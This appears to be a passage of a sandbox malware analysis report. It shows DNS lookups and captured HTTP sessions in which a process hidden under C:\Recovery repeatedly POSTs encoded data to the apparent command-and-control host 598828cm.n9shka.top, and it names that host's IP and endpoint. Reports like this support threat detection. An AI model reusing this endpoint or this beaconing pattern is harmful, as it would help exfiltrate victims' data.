Sep 14, 2024 12:52:09.010723114 CEST	1.1.1.1	192.168.2.4	0x68ef	No error (0)	titanium.roblox.com	edge-term4.roblox.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 14, 2024 12:52:09.010723114 CEST	1.1.1.1	192.168.2.4	0x68ef	No error (0)	edge-term4.roblox.com	edge-term4-fra2.roblox.com		CNAME (Canonical name)	IN (0x0001)	false
Sep 14, 2024 12:52:09.010723114 CEST	1.1.1.1	192.168.2.4	0x68ef	No error (0)	edge-term4-fra2.roblox.com		128.116.123.4	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:52:11.875710964 CEST	1.1.1.1	192.168.2.4	0x1480	No error (0)	www.nodejs.org		104.20.23.46	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:52:11.875710964 CEST	1.1.1.1	192.168.2.4	0x1480	No error (0)	www.nodejs.org		104.20.22.46	A (IP address)	IN (0x0001)	false
Sep 14, 2024 12:53:04.323851109 CEST	1.1.1.1	192.168.2.4	0x99c7	No error (0)	598828cm.n9shka.top		80.211.144.156	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

getsolara.dev

pastebin.com

clientsettings.roblox.com

www.nodejs.org

598828cm.n9shka.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	62761	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:04.342627048 CEST	289	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:04.697323084 CEST	344	OUT	Data Raw: 00 00 04 07 06 0a 01 07 05 06 02 01 02 01 01 00 00 06 05 0d 02 01 03 01 02 0e 0c 0d 04 04 01 04 0a 0e 07 00 07 02 07 00 0c 03 04 53 00 0b 06 04 03 0a 0c 5b 0d 0f 06 57 07 01 06 51 05 00 06 0e 00 06 0c 01 06 05 04 52 0e 03 0f 0e 0f 0c 0c 54 06 06 Data Ascii: S[WQRTT\L}Rk`e\`LT]vhOhBf^cR^so[ol]KzcjJ}\|`gRO}e~V@xCb~b[
Sep 14, 2024 12:53:05.144176006 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:05.144197941 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1340 Connection: keep-alive Data Raw: 56 4a 7d 5f 7b 7e 7b 00 78 61 60 03 7c 61 7f 07 7d 59 63 0d 6b 59 75 0d 7a 63 6c 42 7d 5c 6f 58 77 5d 65 0c 7a 72 75 00 77 65 7b 59 69 5b 78 01 55 4b 72 52 74 61 63 49 68 5c 57 00 7d 77 75 54 6f 48 7c 42 7d 4d 67 47 62 5b 62 5f 74 07 69 48 7c 61 5b 5b 7d 42 5d 51 6a 67 51 49 62 66 7b 06 7c 5c 5c 5a 7e 63 7d 02 7b 01 6c 01 6f 64 6b 5c 79 6d 70 59 78 62 64 48 7b 05 66 03 7d 63 63 5e 6f 59 64 49 7c 61 6c 5d 77 72 70 01 7a 51 41 5b 6b 64 7c 08 6b 5f 57 40 76 52 70 4f 78 7c 7c 48 77 59 7e 0d 6e 61 53 00 7c 7f 69 5b 78 71 58 04 76 63 63 4a 75 5f 63 5f 74 58 6e 50 7e 5d 79 5f 77 71 7d 05 76 65 52 09 7f 55 75 04 60 6f 7c 04 7f 63 6c 07 6f 6f 70 5a 6c 06 76 03 7c 6e 70 08 74 67 6c 04 7e 62 65 50 7e 53 67 0a 6c 0b 6e 4f 7f 62 58 5c 7b 5d 46 51 68 6c 63 54 69 06 7c 0b 6a 49 54 43 7b 43 51 00 6c 61 77 5b 68 4f 7c 58 7d 49 6c 53 7e 63 79 08 7b 63 55 5e 7d 61 7c 02 63 5d 5b 51 7b 5c 79 4a 75 48 7c 07 7e 58 52 04 7e 48 5b 0c 77 72 73 03 7c 5c 65 01 7f 67 7e 0c 78 76 74 08 7d 5d 51 4a 77 62 5b 4c 77 71 75 48 7c 61 [TRUNCATED] Data Ascii: VJ}_{~{xa`\|a}YckYuzclB}\oXw]ezruwe{Yi[xUKrRtacIh\W}wuToH\|B}MgGb[b_tiH\|a[[}B]QjgQIbf{\|\\Z~c}{lodk\ympYxbdH{f}cc^oYdI\|al]wrpzQA[kd\|k_W@vRpOx\|\|HwY~naS\|i[xqXvccJu_c_tXnP~]y_wq}veRUu`o\|cloopZlv\|nptgl~beP~SglnObX\{]FQhlcTi\|jITC{CQlaw[hO\|X}IlS~cy{cU^}a\|c][Q{\yJuH\|~XR~H[wrs\|\eg~xvt}]QJwb[LwquH\|arI}lV}wcu_wxbS}^m{YpCxg\|MxSYyLlx]f\|Nhxw`}\]vaxI\|\|UY\|Oamul`xlhItpn{qWG~BPAzqjv]]DvO\|Nt_z`TtLuu[Zlev\|tMcRIxlcx^T\|mpCtYt~r~O~msxSr~L[}pt\|lhN`xO}YPx}gxLpOU}gwA\|^WyMZ}rttsa{aaDvv\|J}vx}va@wLYILW}gfyfp~sYGwbuAw_mJqf~B\|AgUwa{Gzr[J~`[{w^{Y\|{SHybRIxMr{]NZ{l~al_vX`I\|ogJ{QhqvSw\|{]loc[tYrAza~[~z_z\yvxBagx[L~Jx^vtb[vut\|B}c\|`\|c\|Ix\|{`_Xm`www]~[fzSYQoaeZS[_PrkLQQNSswRRagdEc~{GUrdYWvdTkYvVh\\|u\|c]jRn_zXvfxjXhO}vmtq\|Z[ahgbyet~]ZZuuq\Lr^kbFRpcWQdU[XdHQanJWwqY^Axw`@{m{K{\xK\|^@_hoEUtMiZB`{@Wp][}Z{whmW^ooOTAsuXle}\CYie@VrKbZF`Zc[OS]zp]Y\H{bSzGpQN\koEUNo_FjsUcU@R]yNi~cQzP~_\|uzY [TRUNCATED]
Sep 14, 2024 12:53:05.144207954 CEST	261	IN	Data Raw: 77 50 04 62 59 7b 59 5c 50 60 64 74 51 7f 74 78 5e 62 61 01 41 5b 7d 6e 5e 50 62 06 57 69 0a 0c 08 52 5d 60 4a 5d 60 07 58 57 61 6d 59 7c 5d 72 65 54 5e 55 04 6c 64 68 52 63 0a 60 59 53 71 63 4b 7c 70 0e 5b 7b 71 7f 47 6c 6b 7f 43 6a 04 73 5e 74 Data Ascii: wPbY{Y\P`dtQtx^baA[}n^PbWiR]`J]`XWamY\|]reT^UldhRc`YSqcK\|p[{qGlkCjs^tv^ioEP{gVSb_aCQ]Dcce[ikz\|\zBqZR_ZwE]bSISX][YfTSVbz`oYx]VZQA[oeEQ~AcUChOPW~ZQneZy\_^{]FQhoOSsIi[AmJET[UAU}dXi`x]yK}Z]YRwB]`THVYYe
Sep 14, 2024 12:53:05.144213915 CEST	261	IN	Data Raw: 77 50 04 62 59 7b 59 5c 50 60 64 74 51 7f 74 78 5e 62 61 01 41 5b 7d 6e 5e 50 62 06 57 69 0a 0c 08 52 5d 60 4a 5d 60 07 58 57 61 6d 59 7c 5d 72 65 54 5e 55 04 6c 64 68 52 63 0a 60 59 53 71 63 4b 7c 70 0e 5b 7b 71 7f 47 6c 6b 7f 43 6a 04 73 5e 74 Data Ascii: wPbY{Y\P`dtQtx^baA[}n^PbWiR]`J]`XWamY\|]reT^UldhRc`YSqcK\|p[{qGlkCjs^tv^ioEP{gVSb_aCQ]Dcce[ikz\|\zBqZR_ZwE]bSISX][YfTSVbz`oYx]VZQA[oeEQ~AcUChOPW~ZQneZy\_^{]FQhoOSsIi[AmJET[UAU}dXi`x]yK}Z]YRwB]`THVYYe
Sep 14, 2024 12:53:05.226886988 CEST	265	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 384 Expect: 100-continue
Sep 14, 2024 12:53:05.442635059 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:05.442964077 CEST	384	OUT	Data Raw: 53 53 59 5d 54 46 5f 58 5e 5e 56 51 56 58 54 5e 57 52 5c 5d 57 5d 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SSY]TF_X^^VQVXT^WR\]W]U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(,=3#77-5?0\0(1:?%)=70&;<&F/%Z-%
Sep 14, 2024 12:53:05.729765892 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 5d 29 37 33 03 23 5c 30 53 3c 3f 36 11 2a 0b 36 5f 29 2f 34 06 3e 24 3a 00 3d 13 23 51 27 12 38 18 33 31 0c 01 30 0e 2c 0a 22 2b 2e 5a 0c 1d 23 12 20 0d 2a 59 32 06 04 12 24 1f 25 04 22 21 3b 5f 27 38 2d 13 21 3f 0f 03 28 01 2a 0f 2a 0f 03 54 2a 2e 2e 45 38 5b 2e 50 37 38 23 51 00 10 25 0a 31 3e 39 11 36 19 21 11 3e 0f 07 5c 26 25 26 51 25 28 22 12 25 28 04 04 33 30 3f 11 20 21 23 5c 33 02 05 59 23 1d 0f 51 3c 2e 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: #])73#\0S<?66_)/4>$:=#Q'8310,"+.Z# Y2$%"!;_'8-!?(*T..E8[.P78#Q%1>96!>\&%&Q%("%(30? !#\3Y#Q<.#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	62762	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:07.119715929 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1732 Expect: 100-continue
Sep 14, 2024 12:53:07.478322983 CEST	1732	OUT	Data Raw: 56 52 59 5e 54 48 5a 5e 5e 5e 56 51 56 5b 54 58 57 55 5c 5c 57 5c 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VRY^THZ^^^VQV[TXWU\\W\UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%??6&>)5Q$[(.!6?0(8^%\<(:<15!#2/<&F/%Z-%
Sep 14, 2024 12:53:07.813839912 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:07.949826002 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 20 00 29 0a 38 58 34 04 23 09 2a 3f 0c 13 2b 32 25 07 2a 2c 05 18 29 27 25 1f 2b 2d 3f 18 26 2c 2b 03 26 31 26 04 30 37 3f 51 22 2b 2e 5a 0c 1d 23 58 20 33 0b 05 25 28 29 02 27 08 2e 5f 23 0c 3f 58 26 3b 0f 5b 21 2f 07 02 3c 01 21 57 3e 32 36 0b 2a 3d 0f 1c 38 5b 2a 56 21 38 23 51 00 10 26 18 32 10 32 03 21 09 1b 1e 29 57 29 59 25 26 35 0d 33 05 35 04 25 38 2e 01 24 20 2f 59 20 32 3b 59 27 12 2c 00 34 30 25 51 2b 3e 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: )8X4#?+2%,)'%+-?&,+&1&07?Q"+.Z#X 3%()'._#?X&;[!/<!W>26=8[V!8#Q&22!)W)Y%&535%8.$ /Y 2;Y',40%Q+>#R+(W>\M
Sep 14, 2024 12:53:08.333759069 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 20 00 29 0a 38 58 34 04 23 09 2a 3f 0c 13 2b 32 25 07 2a 2c 05 18 29 27 25 1f 2b 2d 3f 18 26 2c 2b 03 26 31 26 04 30 37 3f 51 22 2b 2e 5a 0c 1d 23 58 20 33 0b 05 25 28 29 02 27 08 2e 5f 23 0c 3f 58 26 3b 0f 5b 21 2f 07 02 3c 01 21 57 3e 32 36 0b 2a 3d 0f 1c 38 5b 2a 56 21 38 23 51 00 10 26 18 32 10 32 03 21 09 1b 1e 29 57 29 59 25 26 35 0d 33 05 35 04 25 38 2e 01 24 20 2f 59 20 32 3b 59 27 12 2c 00 34 30 25 51 2b 3e 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: )8X4#?+2%,)'%+-?&,+&1&07?Q"+.Z#X 3%()'._#?X&;[!/<!W>26=8[V!8#Q&22!)W)Y%&535%8.$ /Y 2;Y',40%Q+>#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	62763	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:07.207932949 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:07.556240082 CEST	1012	OUT	Data Raw: 56 56 5c 58 54 40 5f 58 5e 5e 56 51 56 5c 54 5b 57 55 5c 5c 57 5d 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VV\XT@_X^^VQV\T[WU\\W]U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%]/0.67>#/Z384Y'*0<&"! =,&F/%Z-
Sep 14, 2024 12:53:07.883064985 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:08.014039040 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	62766	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:08.335813999 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:53:08.681015968 CEST	1012	OUT	Data Raw: 56 56 59 59 54 40 5a 5b 5e 5e 56 51 56 58 54 5d 57 51 5c 59 57 5f 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VVYYT@Z[^^VQVXT]WQ\YW_U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%+,&-:#7+(."^"0\3Y2<(01\ 3:/,&F/%Z-%
Sep 14, 2024 12:53:09.009130001 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:09.140309095 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	62768	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:10.178189039 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:10.524940968 CEST	1012	OUT	Data Raw: 53 57 59 59 51 43 5a 5a 5e 5e 56 51 56 5c 54 5c 57 50 5c 5e 57 5d 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SWYYQCZZ^^VQV\T\WP\^W]U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<:0>%"4$[>*]"Y4X$8_1:(9W&9=X##2,&F/%Z-
Sep 14, 2024 12:53:10.862967014 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:11.060072899 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	62769	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:13.677700996 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1744 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:14.024821997 CEST	1744	OUT	Data Raw: 56 53 59 5d 54 45 5a 5e 5e 5e 56 51 56 58 54 58 57 5f 5c 5a 57 50 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VSY]TEZ^^^VQVXTXW_\ZWPUYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?,&-&R!'?=>]5?%88_&*<+_/&9X76,&F/%Z-%
Sep 14, 2024 12:53:14.359977961 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:14.492069960 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 1a 3e 27 3c 58 37 03 2b 0c 3f 2c 35 06 3e 31 36 1b 3e 3f 2f 5a 3e 24 3d 11 3e 3e 33 53 30 02 37 05 27 1f 07 5f 25 24 3f 56 36 3b 2e 5a 0c 1d 23 10 23 23 2e 5a 25 38 36 5b 27 32 2e 17 20 32 23 59 31 15 2d 5a 35 11 2e 5a 3f 28 1b 53 3d 1f 36 0c 28 2d 0c 40 38 03 32 50 34 28 23 51 00 10 25 0a 32 3d 29 13 22 34 36 0e 3e 31 3a 03 31 1b 29 0e 33 3b 2d 03 31 06 2d 5c 25 33 2f 10 20 22 0d 5b 33 2f 3f 5f 23 23 0c 0a 2b 14 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: #>'<X7+?,5>16>?/Z>$=>>3S07'_%$?V6;.Z###.Z%86['2. 2#Y1-Z5.Z?(S=6(-@82P4(#Q%2=)"46>1:1)3;-1-\%3/ "[3/?_##+#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	62770	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:14.270376921 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:14.618558884 CEST	1012	OUT	Data Raw: 56 53 59 54 51 43 5f 5c 5e 5e 56 51 56 5c 54 58 57 54 5c 5e 57 5b 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VSYTQC_\^^VQV\TXWT\^W[U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%<)X3"T#7<Z=>! %;(Y29?[?3P1:73\,<&F/%Z-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	62771	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:15.336014986 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:15.681031942 CEST	1012	OUT	Data Raw: 56 51 59 5d 51 41 5f 59 5e 5e 56 51 56 5d 54 5d 57 54 5c 5c 57 5d 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VQY]QA_Y^^VQV]T]WT\\W]UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<"$->"'=."]!+$(X27Z+)#V'5\ 3=X,&F/%Z-1
Sep 14, 2024 12:53:16.001389027 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:16.128463030 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	62773	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:16.555443048 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:16.903414011 CEST	1012	OUT	Data Raw: 56 53 5c 58 54 42 5f 5e 5e 5e 56 51 56 52 54 5c 57 5e 5c 5b 57 5b 55 5b 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VS\XTB_^^^VQVRT\W^\[W[U[QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<?>'9"=.!#?0+#%97*)4&: =.,&F/%Z-
Sep 14, 2024 12:53:17.239284992 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:53:17.372342110 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:53:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	62774	80.211.144.156	80	4128	C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:53:18.156620979 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1000 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:53:18.509180069 CEST	1000	OUT	Data Raw: 53 52 59 58 54 47 5a 53 5e 5e 56 51 56 5b 54 5b 57 57 5c 59 57 51 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SRYXTGZS^^VQV[T[WW\YWQU^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\+/=^3.S!(])[!5<4\3;%)7)Q29! &8&F/%Z--
Sep 14, 2024 12:53:18.840773106 CEST	25	IN	HTTP/1.1 100 Continue
